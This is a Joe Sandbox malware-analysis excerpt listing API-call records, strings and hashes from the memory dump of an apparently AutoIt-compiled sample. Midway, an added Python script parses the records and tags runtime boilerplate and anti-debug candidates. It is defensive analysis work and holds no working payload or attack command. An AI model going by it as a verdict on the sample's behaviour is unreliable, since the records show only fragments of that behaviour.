                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                                                            • String ID: edit
                                                                                                                            • API String ID: 2978978980-2167791130
                                                                                                                            • Opcode ID: 3897a4b772134fcc88d9e893a488b40e8cc23581c8e8aefedd7596ab094b0734
                                                                                                                            • Instruction ID: a4cf01f9d55789c3e86ff3a1c0a2ff5f3712a89f0be8977fc41ea6d68cecedef
                                                                                                                            • Opcode Fuzzy Hash: 3897a4b772134fcc88d9e893a488b40e8cc23581c8e8aefedd7596ab094b0734
                                                                                                                            • Instruction Fuzzy Hash: 59116A71910208ABEB108E64DC40AEB3AA9EB053B8F504724F9A5E71E0CA75DC94BB60
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F42A22
                                                                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F42A41
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoItemMenu_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 2223754486-4108050209
                                                                                                                            • Opcode ID: 551f5da91741a017b8e56639937b01d013c4b3db6e64c548d8d2ebde840dc5fc
                                                                                                                            • Instruction ID: 395cafc72595eb807bbc63412dbb0c3dfd7e551d3ecb20a6e6a868dc4d9ec2f9
                                                                                                                            • Opcode Fuzzy Hash: 551f5da91741a017b8e56639937b01d013c4b3db6e64c548d8d2ebde840dc5fc
                                                                                                                            • Instruction Fuzzy Hash: 4411D372D01118ABEB70DF98DC44B9ABBB8AB46324F844031FC55E7290D778AD4AF791
                                                                                                                            APIs
                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F5222C
                                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F52255
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                            • String ID: <local>
                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                            • Opcode ID: 72daf4e229d5f1a86817faf16e614c5a3b6a2bf8d004764ba0176c41c373faf6
                                                                                                                            • Instruction ID: 8206de58bbaf2ff5d8cb0c46bfdaa79859827fcb8c18bff5a308e7fd8f150207
                                                                                                                            • Opcode Fuzzy Hash: 72daf4e229d5f1a86817faf16e614c5a3b6a2bf8d004764ba0176c41c373faf6
                                                                                                                            • Instruction Fuzzy Hash: 7511C174901225BAEB248F118C84EB7BBA8FB17362F10832AFA1486000D3705949E6F0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F38E73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassMessageNameSend_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 372448540-1403004172
                                                                                                                            • Opcode ID: 4a4431a138259b4840f9fde0aadc8acd328e5d689bf05e69bc20bfa91c33ed98
                                                                                                                            • Instruction ID: 249123b1d106de3425cb273e4c4e0765daef05efcd0037beb0ad54c815302b2e
                                                                                                                            • Opcode Fuzzy Hash: 4a4431a138259b4840f9fde0aadc8acd328e5d689bf05e69bc20bfa91c33ed98
                                                                                                                            • Instruction Fuzzy Hash: D701DE72A0531CAB9F14ABE1CC419FE73A8EF02370F100A19B871672E2DE395809E661
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: 3c$_
                                                                                                                            • API String ID: 4104443479-4099079164
                                                                                                                            • Opcode ID: 105aa1174520fd8bf29f6690e89b4cfabb317d667cefa397a02f4792fe11b7f1
                                                                                                                            • Instruction ID: fe93f478f914a557d0a2007f646197cf3ae18742ff3972557eda699fbe3a5ba0
                                                                                                                            • Opcode Fuzzy Hash: 105aa1174520fd8bf29f6690e89b4cfabb317d667cefa397a02f4792fe11b7f1
                                                                                                                            • Instruction Fuzzy Hash: 4A018072B00B059FD730CE6CDD94A6AB7E9BB647557104D2EE142CBA51EB72F804AB10
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F38D6B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassMessageNameSend_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 372448540-1403004172
                                                                                                                            • Opcode ID: 9650b08495b81867b3513eb4ab7dd2d6e82c61db840665908d0af3cf4d999d5e
                                                                                                                            • Instruction ID: d9e10aa4402329fa97636a7079572406dc17ba22895f946cdf7d361548cd1941
                                                                                                                            • Opcode Fuzzy Hash: 9650b08495b81867b3513eb4ab7dd2d6e82c61db840665908d0af3cf4d999d5e
                                                                                                                            • Instruction Fuzzy Hash: E501D472A4520CABDF15EBE1CD52AFE73A8DF153A0F100019B855732E2DE295E08E272
APIs
  • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
  • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00F38DEE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: afc1d2cdcea4192efccacf93e063685ce8181d4fffa70f9206284299cbae7888
• Instruction ID: 99dd62b83e9f5db6f40a6b4a9d0f44e0a1ec83ea974574ff9adc7a97f16ccb66
• Opcode Fuzzy Hash: afc1d2cdcea4192efccacf93e063685ce8181d4fffa70f9206284299cbae7888
• Instruction Fuzzy Hash: C301A772A4530DA7DF11E6A5CD42AFE77A8DF11360F100015B855B3292DE295E09F272
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: ff740367b65dae14a01e549eab7d104a276ec906031fb49fbf62e79ee9a123aa
• Instruction ID: 2dfc5f6e9eb9e103f047f36d6da7129cd95ff83a45ccd9e6701e1bf81706aa56
• Opcode Fuzzy Hash: ff740367b65dae14a01e549eab7d104a276ec906031fb49fbf62e79ee9a123aa
• Instruction Fuzzy Hash: 7EE0D13290422D2BD7109755AC45FA7F7ACDB45B70F050057FD04D3151D5609A4997D1
APIs
  • Part of subcall function 00F1B314: _memset.LIBCMT ref: 00F1B321
  • Part of subcall function 00F00940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F1B2F0,?,?,?,00EE100A), ref: 00F00945
• IsDebuggerPresent.KERNEL32(?,?,?,00EE100A), ref: 00F1B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00EE100A), ref: 00F1B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F1B2FE
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: a45c90b99aa6cee02e017f00383c6fb004a06c79971fee471307537987ab2c73
• Instruction ID: 5c82eb1d0605543594cba41af98b5242326763cf4c68febccb39c259453375f8
• Opcode Fuzzy Hash: a45c90b99aa6cee02e017f00383c6fb004a06c79971fee471307537987ab2c73
• Instruction Fuzzy Hash: A0E06D70200744CBD760AF28E8047827AE4EF04714F00892CE466C7741EBB4E488EBA1
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F37C82
  • Part of subcall function 00F03358: _doexit.LIBCMT ref: 00F03362
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: 91d4b70e7ae70a573cc4b9fba1ff03cafab173c9fd636f6d4130feb6102d16a5
• Instruction ID: 8d6882a206e4bb50b60cf3f2e7e18377c11affeeb99e11a845a78c7fa47c67e0
• Opcode Fuzzy Hash: 91d4b70e7ae70a573cc4b9fba1ff03cafab173c9fd636f6d4130feb6102d16a5
• Instruction Fuzzy Hash: 74D05B723C835C36D21532E9BC07FCA76884F05B62F144426FB08695D34DD6859071E7
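Two of the records above should be separated from the sample's own behaviour when reading the signature list. The IsDebuggerPresent / OutputDebugStringW pair sits in ATL's CAtlBaseModule constructor, which only reaches those two calls when InitializeCriticalSectionAndSpinCount fails, and the "Error allocating memory." message box is the AutoIt interpreter's own out-of-memory handler. The Python below is an added example written for this edit, not part of the Joe Sandbox report or its tooling: it parses function records in the layout used on this page, tags those two cases as runtime boilerplate, and names the window-message constants (values from winuser.h) that appear as numeric arguments. The tag names, the classification rules and the trimmed records embedded in SAMPLE are this example's own assumptions.

```python
"""Parse Joe Sandbox function records (APIs / Strings / Similarity) and tag runtime boilerplate."""
import re
from dataclasses import dataclass, field

# Constructed sample in the report's own layout: four of the records above, trimmed.
SAMPLE = """\
APIs
  • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00F38DEE
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,00EE100A), ref: 00F1B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00EE100A), ref: 00F1B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F1B2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F37C82
  • Part of subcall function 00F03358: _doexit.LIBCMT ref: 00F03362
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F6596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F65981
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(args), ref: ADDR"; CRT entries such as _doexit.LIBCMT carry no argument list.
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>[A-Za-z0-9]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function [0-9A-Fa-f]+: (?P<rest>.*)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: [0-9A-Fa-f]+$")
ANTI_DEBUG = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "OutputDebugStringW", "OutputDebugStringA"}
WINDOW_MESSAGES = {0x0111: "WM_COMMAND", 0x0182: "LB_DELETESTRING"}  # winuser.h values


@dataclass
class Record:
    apis: list = field(default_factory=list)      # (name, module, args, ref, is_subcall)
    strings: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""


def parse_records(text):
    """One Record per 'APIs' header; the dump and plugin sections are skipped."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            if line == "APIs":
                current = Record()
                records.append(current)
            section = line
            continue
        line = line.lstrip("• ").strip()
        if current is None or not line:
            continue
        if section == "APIs":
            sub = SUBCALL_RE.match(line)
            m = API_RE.match(sub.group("rest") if sub else line)
            if m:
                args = m.group("args").split(",") if m.group("args") is not None else []
                current.apis.append((m.group("name"), m.group("module"), args, m.group("ref"), bool(sub)))
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                current.strings.append(m.group("text"))
        elif section == "Similarity":
            if line.startswith("API ID: "):
                current.api_id = line[8:]
            elif line.startswith("String ID: "):
                current.string_id = line[11:]
    return records


def classify(rec):
    """Tags are this example's heuristics, not Joe Sandbox signatures."""
    names = {a[0] for a in rec.apis}
    strings = set(rec.strings) | {s for s in rec.string_id.split("$") if s}
    tags = []
    if names & ANTI_DEBUG:
        if any("CAtlBaseModule" in s for s in strings):
            # ATL's CAtlBaseModule constructor only reaches IsDebuggerPresent /
            # OutputDebugStringW when InitializeCriticalSectionAndSpinCount fails.
            tags.append("runtime-boilerplate:ATL")
        else:
            tags.append("anti-debug-candidate")
    if "AutoIt" in strings:
        tags.append("runtime-boilerplate:AutoIt")   # interpreter's own error dialog
    if {"FindWindowW", "PostMessageW"} <= names and "Shell_TrayWnd" in strings:
        tags.append("posts-to-Shell_TrayWnd")
    return tags


def decode_messages(rec):
    """Name the uMsg argument of Send/PostMessageW calls where the record shows it."""
    out = []
    for name, _module, args, ref, _sub in rec.apis:
        if name in ("SendMessageW", "PostMessageW") and len(args) >= 2:
            try:
                msg = int(args[1], 16)
            except ValueError:      # the report prints unresolved arguments as '?'
                continue
            out.append((ref, WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")))
    return out
```

Run parse_records over a full function listing from the report and count how many records tagged anti-debug-candidate survive once ATL's constructor is excluded; those are the ones that still need a look. The 0x197 wParam in the Shell_TrayWnd record is a taskbar command ID rather than a window message, so the decoder deliberately leaves it alone.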
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00F21775
  • Part of subcall function 00F5BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00F2195E,?), ref: 00F5BFFE
  • Part of subcall function 00F5BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F5C010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F2196D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
• Opcode ID: 390d02ac167f4437df2a2031b1acf99429af13afb5839a7c04f55635ea719f30
• Instruction ID: 5266355bc8a0dcadc80bfa6dd2f077373071ea2de8b190bdeb2dc039e75a640b
• Opcode Fuzzy Hash: 390d02ac167f4437df2a2031b1acf99429af13afb5839a7c04f55635ea719f30
• Instruction Fuzzy Hash: 69F0397180001DDFCB25DBA1E984BECBBF8BB58305F240095E512A2090C7714F8AEF65
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F659AE
• PostMessageW.USER32(00000000), ref: 00F659B5
  • Part of subcall function 00F45244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F452BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 9bd14183de42d7f658ee8f44bb558a8b2161f086e6c5fadd6baa7757f28904cc
• Instruction ID: 1dd5792886e3ca726f1ba7cc7705a81331e04d5f97f2e2d4436a094a90baba02
• Opcode Fuzzy Hash: 9bd14183de42d7f658ee8f44bb558a8b2161f086e6c5fadd6baa7757f28904cc
• Instruction Fuzzy Hash: AFD0C9313807157BE664BB70AC0BF967A14AB06B50F051826B656AA1D1C9E4AC04D654
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F6596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F65981
  • Part of subcall function 00F45244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F452BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 90470e667aa57c5a0cf85b5f059277d83d1f4e56fafcbd9beedd88ae3e48bc84
• Instruction ID: c1eba083146c5495e33aa9764e380700fb7a2e43897f33932b41884c226e5930
• Opcode Fuzzy Hash: 90470e667aa57c5a0cf85b5f059277d83d1f4e56fafcbd9beedd88ae3e48bc84
• Instruction Fuzzy Hash: 54D0C931384715B7E664BB70AC0BF967A14AB01B50F051826B65AAA1D1C9E49C04D654